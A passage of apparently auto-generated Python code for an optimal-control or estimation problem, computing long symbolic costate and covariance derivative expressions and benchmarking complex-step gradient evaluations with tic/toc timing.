(tf)*(-lamP11_N*(-p11_n*p11_s**2*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*p12_n*p12_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(-p11_s*p12_n*p12_s*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*p22_n*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(-p11_s*p13_n*p13_s*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*p23_n*p23_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s),
(tf)*(-lamP11_N*(-p11_n*p11_s*p12_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s**2*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(-p12_n*p12_s**2*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p22_n*p22_s*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(-p12_s*p13_n*p13_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p23_n*p23_s*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s - lamP22_N*(-p12_n*p12_s**2*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p22_n*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(-p12_s*p13_n*p13_s*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p23_n*p23_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s),
(tf)*(2*lamP11_N*p13_s*v*sin(theta_n*theta_s)/p11_s - lamP12_N*(-p13_s*v*sin(theta_n*theta_s) + p13_s*v*cos(theta_n*theta_s))/p12_s - lamP22_N*p13_s*v*cos(theta_n*theta_s)/p22_s - lamP33_N*(-p13_n*p13_s*(x_n*x_s - xb)*(p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_s*(x_n*x_s - xb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s + lamP13_N*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + lamP23_N*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p23_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))),
(tf)*(-lamP22_N*(-p12_n*p12_s*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s**2*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(-p13_n*p13_s*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_s*p23_n*p23_s*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s + lamP12_N*p22_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p12_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))),
(tf)*(-lamP22_N*p23_s*v*cos(theta_n*theta_s)/p22_s + lamP13_N*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p13_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + lamP23_N*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + lamP33_N*p23_s*(y_n*y_s - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p33_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))),
(tf)*(lamP13_N*p33_s*v*sin(theta_n*theta_s)/p13_s - lamP23_N*p33_s*v*cos(theta_n*theta_s)/p23_s),
tf*0,
])
print(fx)
tock = toc()
print('A:' + str(tock))
tic()
for i in range(1000):
gx = np.array([
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_n*theta_s)**2 - 2*p13_n*p13_s*v*sin(theta_n*theta_s) - p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*v*sin(theta_n*theta_s) + p13_n*p13_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_n*p13_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_n*p13_s*v*cos(theta_n*theta_s) + p23_n*p23_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_n*p13_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p23_s + lamP33_N*(Dt*sigw**2 - p13_n*p13_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p13_n*p13_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p13_n*p13_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p33_s)/1e-50),
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_n*theta_s)**2 - 2*p13_n*p13_s*v*sin(theta_n*theta_s) - p11_n*p11_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*v*sin(theta_n*theta_s) + p13_n*p13_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p23_n*p23_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_n*p13_s*v*cos(theta_n*theta_s) + p23_n*p23_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p23_n*p23_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p23_s + lamP33_N*(Dt*sigw**2 - p13_n*p13_s*(x_n*x_s - xb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p13_n*p13_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p23_n*p23_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p13_n*p13_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p33_s)/1e-50),
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_s*(1.0e-50*1j + theta_n))**2 - 2*p13_n*p13_s*v*sin(theta_s*(1.0e-50*1j + theta_n)) - p11_n*p11_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_s*(1.0e-50*1j + theta_n))*cos(theta_s*(1.0e-50*1j + theta_n)) - p13_n*p13_s*v*sin(theta_s*(1.0e-50*1j + theta_n)) + p13_n*p13_s*v*cos(theta_s*(1.0e-50*1j + theta_n)) - p12_n*p12_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_s*(1.0e-50*1j + theta_n)) - p13_n*p13_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_s*(1.0e-50*1j + theta_n))**2 + p13_n*p13_s*v*cos(theta_s*(1.0e-50*1j + theta_n)) + p23_n*p23_s*v*cos(theta_s*(1.0e-50*1j + theta_n)) - p12_n*p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_s*(1.0e-50*1j + theta_n)) - p13_n*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s + lamX_N*(ep*u_max*cos(w) + v*cos(theta_s*(1.0e-50*1j + theta_n))/x_s) + lamY_N*v*sin(theta_s*(1.0e-50*1j + theta_n))/y_s)/1e-50),
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_n*theta_s)**2 - 2*p13_n*p13_s*v*sin(theta_n*theta_s) - p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(y_n*y_s - yb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*v*sin(theta_n*theta_s) + p13_n*p13_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - 